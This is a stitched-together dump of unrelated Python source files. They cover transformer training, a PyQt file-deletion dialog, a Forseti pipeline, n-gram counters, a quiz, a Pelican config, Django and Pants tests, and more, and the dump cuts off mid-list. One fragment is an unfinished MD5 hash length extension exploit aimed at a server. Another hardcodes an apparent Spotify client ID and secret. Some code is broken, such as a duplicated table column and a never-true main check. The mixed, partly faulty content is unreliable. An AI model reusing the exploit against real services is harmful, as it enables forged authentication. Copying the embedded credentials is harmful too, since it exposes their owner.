checkpoint_path = "./checkpoints/train"
ckpt = tf.train.Checkpoint(transformer=transformer_obj,
optimizer=optimizer)
ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=5)
# if a checkpoint exists, restore the latest checkpoint.
if ckpt_manager.latest_checkpoint:
ckpt.restore(ckpt_manager.latest_checkpoint)
print('Latest checkpoint restored!!')
# The @tf.function trace-compiles train_step into a TF graph for faster
# execution. The function specializes to the precise shape of the argument
# tensors. To avoid re-tracing due to the variable sequence lengths or variable
# batch sizes (the last batch is smaller), use input_signature to specify
# more generic shapes.
train_step_signature = [
tf.TensorSpec(shape=(None, None), dtype=tf.int64),
tf.TensorSpec(shape=(None, None), dtype=tf.int64),
]
@tf.function(input_signature=train_step_signature)
def train_step(inp, tar):
# logger.info("inp: {}\n shape: {}\n".format(inp, inp.shape))
# tf.print(inp)
# logger.info("tar: {}\n shape: {}\n".format(tar, tar.shape))
# tf.print(tar)
tar_inp = tar[:, :-1]
tar_real = tar[:, 1:]
# logger.info("tar_inp: {}\n shape: {}\n".format(tar_inp, tar_inp.shape))
# tf.print(tar_inp)
# logger.info("tar_real: {}\n shape: {}\n".format(tar_real, tar_real.shape))
# tf.print(tar_real)
enc_padding_mask, combined_mask, dec_padding_mask = create_masks(inp, tar_inp)
with tf.GradientTape() as tape:
predictions, _ = transformer_obj(inp, tar_inp,
True,
enc_padding_mask,
combined_mask,
dec_padding_mask)
loss = loss_function(tar_real, predictions)
gradients = tape.gradient(loss, transformer_obj.trainable_variables)
optimizer.apply_gradients(zip(gradients, transformer_obj.trainable_variables))
train_loss(loss)
train_accuracy(tar_real, predictions)
for epoch in range(EPOCHS):
start = time.time()
train_loss.reset_states()
train_accuracy.reset_states()
# inp -> portuguese, tar -> english
for (batch, (inp, tar)) in enumerate(train_dataset):
train_step(inp, tar)
if batch % 50 == 0:
print('Epoch {} Batch {} Loss {:.4f} Accuracy {:.4f}'.format(
epoch + 1, batch, train_loss.result(), train_accuracy.result()))
if (epoch + 1) % 5 == 0:
ckpt_save_path = ckpt_manager.save()
print('Saving checkpoint for epoch {} at {}'.format(epoch + 1,
ckpt_save_path))
print('Epoch {} Loss {:.4f} Accuracy {:.4f}'.format(epoch + 1,
train_loss.result(),
train_accuracy.result()))
print('Time taken for 1 epoch: {} secs\n'.format(time.time() - start))
# def evaluate(inp_sentence):
# start_token = [tokenizer_pt.vocab_size]
# end_token = [tokenizer_pt.vocab_size + 1]
#
# # inp sentence is portuguese, hence adding the start and end token
# inp_sentence = start_token + tokenizer_pt.encode(inp_sentence) + end_token
# encoder_input = tf.expand_dims(inp_sentence, 0)
#
# # as the target is english, the first word to the transformer should be the
# # english start token.
# decoder_input = [tokenizer_en.vocab_size]
# output = tf.expand_dims(decoder_input, 0)
#
# for i in range(MAX_LENGTH):
# enc_padding_mask, combined_mask, dec_padding_mask = create_masks(
# encoder_input, output)
#
# # predictions.shape == (batch_size, seq_len, vocab_size)
# predictions, attention_weights = transformer(encoder_input,
# output,
# False,
# enc_padding_mask,
# combined_mask,
# dec_padding_mask)
#
# # select the last word from the seq_len dimension
# predictions = predictions[:, -1:, :] # (batch_size, 1, vocab_size)
#
# predicted_id = tf.cast(tf.argmax(predictions, axis=-1), tf.int32)
#
# # return the result if the predicted_id is equal to the end token
# if predicted_id == tokenizer_en.vocab_size + 1:
# return tf.squeeze(output, axis=0), attention_weights
#
# # concatentate the predicted_id to the output which is given to the decoder
# # as its input.
# output = tf.concat([output, predicted_id], axis=-1)
#
# return tf.squeeze(output, axis=0), attention_weights
# create_dataset()
# logging.basicConfig(level=logging.INFO)
train_translation_model() |
from hashlib import *
from pwn import p64
# Currently works only for md5 hashes
"""
Step 1: Get the values of data, append, length of the string from the user
Step 2: (i) Pad the secret+data with '1' and '0's such that the resultant length
becomes congruent to 56 modulus 64
(ii) Convert length of secret+data in bytes to bits and represent it in
64 bit little endian
Step 3: Send the padded secret+data to the server and get the hash (Let this
hash be h1)
Step 4: Append append_string to this hash and send the hash again to the server
Step 5: The output hash contains the secret. So we calculated the hash of a
string containing secret without actually knowing the secret
Moral of the story: Use HMAC
"""
obj1 = md5()
def padding(text):
pt_hex = text.encode("hex") + "80"
while len(pt_hex)/2 % 64 != 56:
pt_hex += "00"
pt_hex += p64(len(text)*8).encode("hex")
return pt_hex.decode("hex")
def hash_len_exploit():
if '__name__' == '__main__':
hash_algo = raw_input("Enter the hashing algorithm: ")
if hash_algo == "md5":
data = raw_input("Enter the data to be signed: ")
append = raw_input("Enter the string to be appended: ")
|
import GlobalSettings
import os
from PyQt5 import QtWidgets, Qt, uic
import traceback
import math
#global logger
logger = GlobalSettings.logger
###########################################################
# closingWindow: this class is a little window where the user can select which files they want to delete
# Once they hit 'submit' it will delete all of the files selected, and close the program.
# If no files are selected, the program closes and no files are deleted
# Inputs are taking from the user (selecting files to delete and hitting submit), as well as GlobalSettings for the files in CSPR_DB
# Outputs are the files are deleting, and the program is closed
###########################################################
class closingWindow(QtWidgets.QMainWindow):
def __init__(self):
try:
# qt stuff
super(closingWindow, self).__init__()
uic.loadUi(GlobalSettings.appdir + "closing_window.ui", self)
self.setWindowTitle("Delete Files")
self.setWindowIcon(Qt.QIcon(GlobalSettings.appdir + "cas9image.ico"))
# button connections
self.submit_button.clicked.connect(self.submit_and_close)
# table stuff
self.files_table.setColumnCount(1)
self.files_table.setShowGrid(True)
self.files_table.setHorizontalHeaderLabels("File Name;".split(";"))
self.files_table.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows)
self.files_table.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
self.files_table.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)
#scale UI
self.scaleUI()
except Exception as e:
logger.critical("Error initializing closingWindow class.")
logger.critical(e)
logger.critical(traceback.format_exc())
msgBox = QtWidgets.QMessageBox()
msgBox.setStyleSheet("font: " + str(self.fontSize) + "pt 'Arial'")
msgBox.setIcon(QtWidgets.QMessageBox.Icon.Critical)
msgBox.setWindowTitle("Fatal Error")
msgBox.setText("Fatal Error:\n"+str(e)+ "\n\nFor more information on this error, look at CASPER.log in the application folder.")
msgBox.addButton(QtWidgets.QMessageBox.StandardButton.Close)
msgBox.exec()
exit(-1)
#scale UI based on current screen
def scaleUI(self):
try:
self.repaint()
QtWidgets.QApplication.processEvents()
screen = self.screen()
dpi = screen.physicalDotsPerInch()
width = screen.geometry().width()
height = screen.geometry().height()
# font scaling
fontSize = 12
self.fontSize = fontSize
self.centralWidget().setStyleSheet("font: " + str(fontSize) + "pt 'Arial';")
self.adjustSize()
currentWidth = self.size().width()
currentHeight = self.size().height()
# window scaling
# 1920x1080 => 1150x650
scaledWidth = int((width * 400) / 1920)
scaledHeight = int((height * 300) / 1080)
if scaledHeight < currentHeight:
scaledHeight = currentHeight
if scaledWidth < currentWidth:
scaledWidth = currentWidth
screen = QtWidgets.QApplication.desktop().screenNumber(QtWidgets.QApplication.desktop().cursor().pos())
centerPoint = QtWidgets.QApplication.desktop().screenGeometry(screen).center()
x = centerPoint.x()
y = centerPoint.y()
x = x - (math.ceil(scaledWidth / 2))
y = y - (math.ceil(scaledHeight / 2))
self.setGeometry(x, y, scaledWidth, scaledHeight)
self.repaint()
QtWidgets.QApplication.processEvents()
except Exception as e:
logger.critical("Error in scaleUI() in closing window.")
logger.critical(e)
logger.critical(traceback.format_exc())
msgBox = QtWidgets.QMessageBox()
msgBox.setStyleSheet("font: " + str(self.fontSize) + "pt 'Arial'")
msgBox.setIcon(QtWidgets.QMessageBox.Icon.Critical)
msgBox.setWindowTitle("Fatal Error")
msgBox.setText("Fatal Error:\n"+str(e)+ "\n\nFor more information on this error, look at CASPER.log in the application folder.")
msgBox.addButton(QtWidgets.QMessageBox.StandardButton.Close)
msgBox.exec()
exit(-1)
#center UI on current screen
def centerUI(self):
try:
self.repaint()
QtWidgets.QApplication.processEvents()
#center window on current screen
width = self.width()
height = self.height()
screen = QtWidgets.QApplication.desktop().screenNumber(QtWidgets.QApplication.desktop().cursor().pos())
centerPoint = QtWidgets.QApplication.desktop().screenGeometry(screen).center()
x = centerPoint.x()
y = centerPoint.y()
x = x - (math.ceil(width / 2))
y = y - (math.ceil(height / 2))
self.setGeometry(x, y, width, height)
self.repaint()
QtWidgets.QApplication.processEvents()
except Exception as e:
logger.critical("Error in centerUI() in closing window.")
logger.critical(e)
logger.critical(traceback.format_exc())
msgBox = QtWidgets.QMessageBox()
msgBox.setStyleSheet("font: " + str(self.fontSize) + "pt 'Arial'")
msgBox.setIcon(QtWidgets.QMessageBox.Icon.Critical)
msgBox.setWindowTitle("Fatal Error")
msgBox.setText("Fatal Error:\n"+str(e)+ "\n\nFor more information on this error, look at CASPER.log in the application folder.")
msgBox.addButton(QtWidgets.QMessageBox.StandardButton.Close)
msgBox.exec()
exit(-1)
# this function will delete selected files, and then close the program
def submit_and_close(self):
try:
# loop through the whole table
for i in range(self.files_table.rowCount()):
tabWidget = self.files_table.item(i, 0)
# if that specific tab is selected, delete it. otherwise do nothing
if tabWidget.isSelected():
os.remove(tabWidget.text())
# close the program now
self.close()
except Exception as e:
logger.critical("Error in sumbit_and_close() in closing window.")
logger.critical(e)
logger.critical(traceback.format_exc())
msgBox = QtWidgets.QMessageBox()
msgBox.setStyleSheet("font: " + str(self.fontSize) + "pt 'Arial'")
msgBox.setIcon(QtWidgets.QMessageBox.Icon.Critical)
msgBox.setWindowTitle("Fatal Error")
msgBox.setText("Fatal Error:\n"+str(e)+ "\n\nFor more information on this error, look at CASPER.log in the application folder.")
msgBox.addButton(QtWidgets.QMessageBox.StandardButton.Close)
msgBox.exec()
exit(-1)
# this function gets all of the files from the CSPR_DB and puts them all into the table
def get_files(self):
try:
loopCount = 0
# get the file names from CSPR_DB
files_names = os.listdir(GlobalSettings.CSPR_DB)
files_names.sort(key=str.lower)
self.files_table.setRowCount(len(files_names))
# loop through and add them to the table
for file in files_names:
tabWidget = QtWidgets.QTableWidgetItem(file)
self.files_table.setItem(loopCount, 0, tabWidget)
loopCount += 1
self.files_table.resizeColumnsToContents()
except Exception as e:
logger.critical("Error in get_files() in closing window.")
logger.critical(e)
logger.critical(traceback.format_exc())
msgBox = QtWidgets.QMessageBox()
msgBox.setStyleSheet("font: " + str(self.fontSize) + "pt 'Arial'")
msgBox.setIcon(QtWidgets.QMessageBox.Icon.Critical)
msgBox.setWindowTitle("Fatal Error")
msgBox.setText("Fatal Error:\n"+str(e)+ "\n\nFor more information on this error, look at CASPER.log in the application folder.")
msgBox.addButton(QtWidgets.QMessageBox.StandardButton.Close)
msgBox.exec()
exit(-1) |
# Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Pipeline to load GSuite Groups into Inventory."""
import json
from google.cloud.security.common.gcp_api import errors as api_errors
from google.cloud.security.common.util import log_util
from google.cloud.security.inventory import errors as inventory_errors
from google.cloud.security.inventory.pipelines import base_pipeline
LOGGER = log_util.get_logger(__name__)
class LoadGroupsPipeline(base_pipeline.BasePipeline):
"""Pipeline to load groups data into Inventory."""
RESOURCE_NAME = 'groups'
def _transform(self, resource_from_api):
"""Yield an iterator of loadable groups.
Args:
resource_from_api (list): Group objects from the Admin SDK.
Yields:
iterable: Loadable groups as a per-group dictionary.
"""
for group in resource_from_api:
yield {'group_id': group.get('id'),
'group_email': group.get('email'),
'group_kind': group.get('kind'),
'direct_member_count': group.get('directMembersCount'),
'raw_group': json.dumps(group)}
def _retrieve(self):
"""Retrieve the groups from GSuite.
Returns:
list: Group list objects from the Admin SDK.
Raises:
LoadDataPipelineException: An error with loading data has occurred.
"""
try:
return self.api_client.get_groups()
except api_errors.ApiExecutionError as e:
raise inventory_errors.LoadDataPipelineError(e)
def run(self):
"""Runs the load GSuite account groups pipeline."""
groups_map = self._retrieve()
if isinstance(groups_map, list):
loadable_groups = self._transform(groups_map)
self._load(self.RESOURCE_NAME, loadable_groups)
self._get_loaded_count()
else:
LOGGER.warn('No groups retrieved.')
|
########################################
# This script is a helpful tool for locating the position of context corresponding to the quesition.
# Calculating N-gram language model probabilites of context sentence.
import math
import sys
import operator
########################################
# Language model functions
def unigram(fileName):
f = open(fileName, 'r')
uniDic = {}
count = 0
for line in f.readlines():
line = line.lower().split()
#line.append("</s>")
for word in line:
count += 1
if uniDic.has_key(word):
uniDic[word] += 1
else :
uniDic[word] = 1
f1 = open('output.txt','w')
sort = sorted(uniDic.items(), key=operator.itemgetter(1), reverse=True)
for key in sort:
#if key[1] < 5:
#f1.write(key[0] + ':' + str(math.log(float(key[1])/count)) + '\n')
f1.write(key[0] + ':' + str(float(key[1])/count) + '\n')
f1.write(str(count) + '\n')
f.close()
f1.close()
return count,uniDic
def bigram(fileName):
f = open(fileName, 'r')
biDic = {}
uniDic = {}
count = 0
for line in f.readlines():
line = line.lower().split()
#line.append("</s>")
line.insert(0, "<s>")
for i in range(1, len(line)-1):
biword = line[i-1] + ' ' + line[i]
if not biDic.has_key(biword):
count += 1
biDic[biword] = 1
if not uniDic.has_key(line[i-1]):
uniDic[line[i-1]] = 1
#uniDic[""] = 1
else:
uniDic[line[i-1]] += 1
#uniDic[""] += 1
else :
biDic[biword] += 1
uniDic[line[i-1]] += 1
#uniDic[""] += 1
f1 = open('output','a')
sort = sorted(biDic.items(), key=operator.itemgetter(1), reverse=True)
s = {}
for key in sort:
word = key[0].split()
word.pop()
myword = " ".join(word)
s[key[0]] = float(key[1])/uniDic[myword]
#f1.write(key[0] + ':' + str(math.log(float(key[1])/uniDic[myword])) + '\n')
#f1.write(key[0] + ':' + str(float(key[1])/uniDic[myword]) + '\n')
sort = sorted(s.items(), key=operator.itemgetter(1), reverse=True)
for key in sort:
f1.write(key[0] + ':' + str(key[1]) + '\n')
f1.write(str(count) + '\n')
f.close()
f1.close()
return biDic
def trigram(fileName):
f = open(fileName, 'r')
biDic = {}
triDic = {}
count = 0
for line in f.readlines():
line = line.lower().split()
#line.append("</s>")
line.insert(0, "<s>")
for i in range(2, len(line)-1):
biword = line[i-2] + ' ' + line[i-1]
triword = line[i-2] + ' ' + line[i-1] + ' ' + line[i]
if not triDic.has_key(triword):
count += 1
triDic[triword] = 1
if not biDic.has_key(biword):
biDic[biword] = 1
#biDic[""] = 1
else:
biDic[biword] += 1
else :
triDic[triword] += 1
biDic[biword] += 1
#biDic[""] += 1
f1 = open('output','a')
sort = sorted(triDic.items(), key=operator.itemgetter(1), reverse=True)
s = {}
for key in sort:
word = key[0].split()
word.pop()
myword = " ".join(word)
s[key[0]] = float(key[1])/biDic[myword]
#f1.write(key[0] + ':' + str(math.log(float(key[1])/biDic[myword])) + '\n')
#f1.write(key[0] + ':' + str(float(key[1])/biDic[myword]) + '\n')
sort = sorted(s.items(), key=operator.itemgetter(1), reverse=True)
for key in sort:
f1.write(key[0] + ':' + str(key[1]) + '\n')
f1.write(str(count) + '\n')
f.close()
f1.close()
return triDic
#unigram(fileName)
#bigram(fileName)
#trigram(fileName)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__version__ = '1.0.1'
from web_backend.nvlserver.module import nvl_meta
from sqlalchemy import (
BigInteger, String, Column, Boolean, DateTime, Table, ForeignKey, func, LargeBinary, PrimaryKeyConstraint,
Numeric
)
from sqlalchemy.dialects.postgresql import JSONB
hw_command = Table(
'user_hw_command',
nvl_meta,
Column('id', BigInteger, primary_key=True),
Column('user_id', BigInteger, ForeignKey('user.id'), nullable=True),
Column('hw_action_id', BigInteger, ForeignKey('hw_action.id'), nullable=True),
Column('traceable_object_id', BigInteger, ForeignKey('traceable_object.id'), nullable=True),
Column('hw_module_id', BigInteger, ForeignKey('hw_module.id'), nullable=True),
Column('proto_field', String(length=255), nullable=False, default=''),
Column('field_type', String(length=32), nullable=False, default=''),
Column('proto_field', String(length=255), nullable=False, default=''),
Column('state', String(length=32), nullable=False, default=''),
Column('ack_message', Boolean, nullable=False, default=False),
Column('active', Boolean, nullable=False),
Column('deleted', Boolean, nullable=False),
Column('date_from', DateTime(timezone=True), server_default=func.now(), nullable=False),
Column('date_to', DateTime(timezone=True), server_default=func.now(), nullable=False),
Column('created_on', DateTime(timezone=True), server_default=func.now(), nullable=False),
Column('updated_on', DateTime(timezone=True), server_default=func.now(), onupdate=func.now(), nullable=False),
)
|
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 2 12:30:10 2021
@author: Victor
"""
import requests
import base64
import spotipy
from spotipy.oauth2 import SpotifyClientCredentials
def auth():
return auth_manager
Client_ID = 'c6d7404e014a4395b773c3b3f4c50d95'
Client_Secret = '8004465dd19444eab523311469c7a065'
spotify_url = 'https://accounts.spotify.com/api/token'
client_creds = f"{Client_ID}:{Client_Secret}"
creds_b64 = base64.b64encode(client_creds.encode())
body = {'grant_type': 'client_credentials'}
header = {'Authorization': f"Basic {creds_b64.decode()}"}
r = requests.post(spotify_url, data = body, headers=header)
auth_manager = SpotifyClientCredentials(client_id=Client_ID, client_secret=Client_Secret)
sp = spotipy.Spotify(auth_manager=auth_manager) |
questions = ["What is the capital of telangana?","Which is the smallest state in India?","Which is the most populated country in the world?","What is the capital of Himachal Pradesh?","Raipur is the capital of which state of India?"]
first_options = ["Jaipur","Maharastra", "USA","Chandigarh","Chhattisgarh"]
second_options = ["Thiruvananthapuram","Goa","Pakistan","Dharamshala","uttrakhand"]
third_options = ["Chennai","Bihar","China","Shimla","Harayana"]
fourth_options = ["Hydarabad","Rajesthan","India","Delhi","Asam"]
all_options = ["first_options","second_options","third_options","fourth_options"]
ans_key = [4,2,3,2,1]
index = 0
money = 0
while index < len(questions):
print " Q-" + str(1 + index)+" : " + questions[index]
print " 1) :" + first_options[index]
print " 2) :" + second_options[index]
print " 3) :" + third_options[index]
print " 4) :" + fourth_options[index]
user_input = int(raw_input("Enter your Answer : " ))
if user_input == ans_key[index]:
money = money + 1000000
print "SAHI JAVAB !!! :) "
else:
print "GALAT JAVAB (BETTER LUCK NEXT TIME!!) : "
break
index = index + 1
print "KHELA KHATAM"
print "AAP JEET GAYE HAI " + str(money) + " RUPEE NAGAD!!!!:) " |
#!/usr/bin/env python
# -*- coding: utf-8 -*- #
from __future__ import unicode_literals
AUTHOR = u'Andre Fellipe'
SITEURL = 'https://andrefellipe.com'
SITENAME = u"Andre Fellipe"
SITETITLE = u'Andre Fellipe'
SITESUBTITLE = u'made on the internet'
SITEDESCRIPTION = "Andre's personal site"
SITELOGO = SITEURL + '/images/badge.jpeg'
USER_LOGO_URL = SITEURL + '/images/badge.jpeg'
RELATIVE_URLS = True
DISABLE_URL_HASH = True
PYGMENTS_STYLE = 'native'
BROWSER_COLOR = '#333333'
ROBOTS = 'index, follow'
PATH = 'content'
TIMEZONE = 'America/Recife'
DEFAULT_LANG = u'en'
OG_LOCALE = u'en_US.utf8'
LOCALE = u'en_US.utf8'
DATE_FORMATS = {
'en': '%b %d, %Y',
}
MAIN_MENU = True
MENUITEMS = (
('Archives', '/archives.html'),
('Categories', '/categories.html'),)
HOME_HIDE_TAGS = True
DISPLAY_CATEGORIES_ON_MENU = True
DEFAULT_PAGINATION = 10
CC_LICENSE = {
'name': 'Creative Commons Attribution-ShareAlike',
'version': '4.0',
'slug': 'by-sa'
}
COPYRIGHT_YEAR = 2018
# Social widget
SOCIAL = (('linkedin', 'https://www.linkedin.com/in/andrefellipe/'),
('github', 'https://github.com/andrefellipe/'),
('envelope-o', 'mailto:andrefellipern@gmail.com'),
)
STATIC_PATHS = ['images', 'extra']
ARTICLE_EXCLUDES = ['extra']
EXTRA_PATH_METADATA = {
'extra/CNAME': {'path': 'CNAME'},
'extra/favicon.ico': {'path': 'favicon.ico'},
}
USE_LESS = True
THEME = "./flex"
PLUGIN_PATHS = ["./plugins"]
PLUGINS = ['code_include']
DISQUS_SITENAME = "andrefellipe"
ADD_THIS_ID = 'ra-5ba05ddbeb328e87'
|
import sys, os
import numpy as np
sys.path.append(os.pardir)
from common.util import im2col
a1 = np.random.rand(5, 9, 11, 11)
col1 = im2col(a1, 10, 10, stride=2, pad=1)
print(col1.shape) # (20, 900)
a2 = np.random.rand(30, 7, 9, 9)
col2 = im2col(a2, 10, 10, stride=2, pad=1)
print(col2.shape) # (30, 700)
|
a=input("Write a: ")
b=input("Write b: ")
S=float(a)*float(b)
print(S)
P=2*(float(a)+float(b))
print(P) |
# -*- coding: utf-8 -*-
import pytest
from django.core.management import call_command
from chloroform.mails import ChloroformMailBuilder
from chloroform.models import Contact, Configuration
@pytest.fixture
@pytest.mark.django_db
def cf(settings):
settings.CHLOROFORM_DOMAIN = 'https://chloroform.emencia.net'
settings.CHLOROFORM_TARGET_EMAILS = ['chloroform@emencia.net']
settings.DEFAULT_FROM_EMAIL = 'contact@emencia.net'
call_command('loaddata', 'chloroform/tests/test_mails.yaml')
yield Configuration.objects.get_default(), Contact.objects.get(pk=1)
@pytest.mark.django_db
def test_mail_builder(cf):
conf, contact = cf
c = ChloroformMailBuilder(conf)
e = c.get_email(contact)
assert 'mark02' in e.body
assert 'https://chloroform.emencia.net' in e.body
@pytest.mark.django_db
def test_mail_builder_request(cf, rf):
conf, contact = cf
c = ChloroformMailBuilder(conf, request=rf.get('/',
SERVER_NAME='chloroform.emencia.org'))
e = c.get_email(contact)
assert 'mark02' in e.body
assert 'http://chloroform.emencia.org' in e.body
@pytest.mark.django_db
def test_mail_builder_alternative_template(cf):
conf, contact = cf
conf.name = 'alternative'
c = ChloroformMailBuilder(conf)
e = c.get_email(contact)
assert 'mark01' in e.body
assert 'https://chloroform.emencia.net' in e.body
@pytest.mark.django_db
def test_mail_builder_to_conf(cf):
conf, contact = cf
conf.target = 'chloroform@emencia.net'
c = ChloroformMailBuilder(conf)
e = c.get_email(contact)
assert e.to == ['chloroform@emencia.net']
@pytest.mark.django_db
def test_mail_builder_to_default(cf):
conf, contact = cf
c = ChloroformMailBuilder(conf)
e = c.get_email(contact)
assert e.to == ['chloroform@emencia.net']
@pytest.mark.django_db
def test_mail_builder_from_default(cf):
conf, contact = cf
c = ChloroformMailBuilder(conf)
e = c.get_email(contact)
assert e.from_email == 'contact@emencia.net'
@pytest.mark.django_db
def test_mail_builder_from_conf(settings, cf):
settings.CHLOROFORM_FROM_EMAIL = 'contact@chloroform.net'
conf, contact = cf
c = ChloroformMailBuilder(conf)
e = c.get_email(contact)
assert e.from_email == 'contact@chloroform.net'
@pytest.mark.django_db
def test_mail_builder_metadata(cf):
conf, contact = cf
c = ChloroformMailBuilder(conf)
context = c.get_context(contact)
assert context['metadata'] == {
'nom': 'Albert',
}
|
"""
The disappearing cross task reimplemented from Blascovich & Katkin 1993.
mattcieslak@gmail.com
"""
from fmri_trigger import TRIGGER_EVENT, RIGHT_BUTTON_EVENT, LEFT_BUTTON_EVENT
import viz, vizact, viztask, vizinfo
# Images
cue = viz.addTexture("images/cue.png")
hbar = viz.addTexture("images/hbar.png")
vbar = viz.addTexture("images/vbar.png")
cross = viz.add("images/cross.png")
# Sounds
correct_sound = viz.addAudio("images/beep-8.wav")
incorrect_sound = viz.addAudio("images/beep-3.wav")
# Text for feedback
block_text = viz.addText("",parent=viz.SCREEN)
block_text.setPosition(0.5,0.8)
block_text.alignment(viz.ALIGN_CENTER_CENTER)
block_text.font("times.ttf")
MESSAGE_TIME = 1
# ---------- Configure so responses are mapped to cross components --
HBAR_RESPONSE = viztask.waitEvent(LEFT_BUTTON_EVENT,all=True)
VBAR_RESPONSE = viztask.waitEvent(RIGHT_BUTTON_EVENT,all=True)
# -------------------------------------------------------------------
#Add quad to screen
quad = viz.addTexQuad( viz.SCREEN , pos=(0.5,0.5,0) , scale=(5,5,5) )
#quad.texture(cross)
def training_display(rt,acc):
print "acc",acc
if acc:
msg = "RIGHT"
correct_sound.play()
else:
msg = "WRONG"
incorrect_sound.play()
block_text.message(msg + " %.2fs"%rt)
vizact.ontimer2(rate=MESSAGE_TIME, repeats=0,func=clear_text)
def success_display(rt):
#block_text.message("Success")
#vizact.ontimer2(rate=MESSAGE_TIME, repeats=0,func=clear_text)
correct_sound.play()
block_text.message("GOOD %.2fs"%rt)
vizact.ontimer2(rate=MESSAGE_TIME, repeats=0,func=clear_text)
def fail_display(failtype,rt):
#block_text.message("Failure")
#vizact.ontimer2(rate=MESSAGE_TIME, repeats=0,func=clear_text)
incorrect_sound.play()
block_text.message(failtype + " %.2fs"%rt)
vizact.ontimer2(rate=MESSAGE_TIME, repeats=0,func=clear_text)
def end_block(correct,ntrials):
block_text.message("SCORE: %i/%i"%(correct,ntrials))
vizact.ontimer2(rate=MESSAGE_TIME, repeats=0,func=clear_text)
#block_text.visible(True)
#viztask.waitTime(1)
#block_text.visible(False)
def clear_text():
block_text.message("")
def cross_trial(start_time, wait_time, rt_deadline, remove,
message="",training=False):
""" Implements a single trial
Parameters
==========
start_time:float
IF start_time == 0, wait for the next trigger pulse. Else,
wait until start_time to begin the trial.
wait_time:float
time to wait until the cross should remove one of its lines
rt_deadline:float
if the subject did not respond more quickly than the deadline,
tell them they blew it
remove:str
The portion of the cross to remove. Either "hbar" or "vbar".
"""
descr = {"onset":start_time,
"duration":wait_time,
"crossbar":remove}
new_texture = hbar if remove == "vbar" else vbar
if start_time == 0:
yield vizact.waitsignal(TRIGGER_EVENT)
else:
while viz.tick() < start_time:
yield viz.waitTime(0.01)
# ---- If there's a message, display it for MESSAGE_TIME
#block_text.message(message)
#vizact.ontimer2(rate=MESSAGE_TIME, repeats=0,func=clear_text)
# ---- Flash the cue
quad.texture(cue)
yield viztask.waitTime(0.5)
quad.texture(cross)
# ---- Wait the required time
yield viztask.waitTime(wait_time)
# ---- Set the new texture
quad.texture(new_texture)
#Wait for next frame to be drawn to screen
d = yield viztask.waitDraw()
#Save display time
displayTime = d.time
#Wait for a reaction
reaction = yield viztask.waitAny(
[HBAR_RESPONSE,
VBAR_RESPONSE] )
time_at_response, = reaction.data.data[0]
# How did they do??
# -> Hbar remains
if reaction.condition is HBAR_RESPONSE:
descr["acc_success"] = remove == "vbar"
response = "hbar"
# -> vbar remains
if reaction.condition is VBAR_RESPONSE:
descr["acc_success"] = remove == "hbar"
response = "vbar"
# print "removed:", remove,"responded:",response
# Calculate reaction time
reactionTime = time_at_response - displayTime
descr["speed_success"] = reactionTime < rt_deadline
success = descr["speed_success"] and descr["acc_success"]
# What sort of feedback to give?
#if training:
# In training blocks, show the rt
#yield training_display(reactionTime,descr["acc_success"])
#else:
if success:
yield success_display(reactionTime)
else:
failtype = "WRONG" if descr["speed_success"] else "TIMEOUT"
yield fail_display(failtype, reactionTime)
quad.texture(cross)
descr["response"] = response
descr["success"] = success
descr["rt"] = reactionTime
descr["rt_deadline"]= rt_deadline
descr["changetime"] = d.time
viztask.returnValue(descr)
def cross_block(list_of_trials,training=False):
# keep track of trial results
results = []
successes = 0
block_text.message("DEADLINE: %.2f"%list_of_trials[0][2])
vizact.ontimer2(rate=MESSAGE_TIME, repeats=0,func=clear_text)
# Loop over the rest of the trials
for trial in list_of_trials[1:]:
res = yield cross_trial(*trial,training=training)
results.append(res)
successes += results[-1]["success"]
# Display successes at the end
yield end_block(successes,len(list_of_trials))
yield viztask.waitTime(4)
# Clear the message
block_text.message("")
viztask.returnValue( results )
if __name__ == "__main__":
viz.go()
viz.clearcolor(viz.GRAY)
from design.sequence import create_full_experiment
def multitrial():
results = []
blocks = create_full_experiment([0.3, 0.2, 0.4, 0.5])
for block in blocks:
results += yield cross_block(block,training=True)
viztask.returnValue(results)
res = viztask.schedule(multitrial()) |
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import re
from textwrap import dedent
from typing import Iterable
import pytest
from internal_plugins.test_lockfile_fixtures.lockfile_fixture import (
JVMLockfileFixture,
JVMLockfileFixtureDefinition,
)
from pants.backend.java.compile.javac import rules as javac_rules
from pants.backend.java.target_types import JavaSourcesGeneratorTarget, JunitTestsGeneratorTarget
from pants.backend.java.target_types import rules as target_types_rules
from pants.backend.scala.compile.scalac import rules as scalac_rules
from pants.backend.scala.target_types import ScalaJunitTestsGeneratorTarget
from pants.backend.scala.target_types import rules as scala_target_types_rules
from pants.core.goals.test import TestResult, get_filtered_environment
from pants.core.target_types import FilesGeneratorTarget, FileTarget, RelocatedFiles
from pants.core.util_rules import config_files, source_files
from pants.core.util_rules.external_tool import rules as external_tool_rules
from pants.engine.addresses import Addresses
from pants.engine.target import CoarsenedTargets
from pants.jvm import classpath
from pants.jvm.jdk_rules import rules as java_util_rules
from pants.jvm.non_jvm_dependencies import rules as non_jvm_dependencies_rules
from pants.jvm.resolve.coursier_fetch import rules as coursier_fetch_rules
from pants.jvm.resolve.coursier_setup import rules as coursier_setup_rules
from pants.jvm.strip_jar import strip_jar
from pants.jvm.target_types import JvmArtifactTarget
from pants.jvm.test.junit import JunitTestRequest
from pants.jvm.test.junit import rules as junit_rules
from pants.jvm.test.testutil import run_junit_test
from pants.jvm.testutil import maybe_skip_jdk_test
from pants.jvm.util_rules import rules as util_rules
from pants.testutil.rule_runner import QueryRule, RuleRunner
# TODO(12812): Switch tests to using parsed junit.xml results instead of scanning stdout strings.
@pytest.fixture
def rule_runner() -> RuleRunner:
rule_runner = RuleRunner(
preserve_tmpdirs=True,
rules=[
*classpath.rules(),
*config_files.rules(),
*coursier_fetch_rules(),
*coursier_setup_rules(),
*external_tool_rules(),
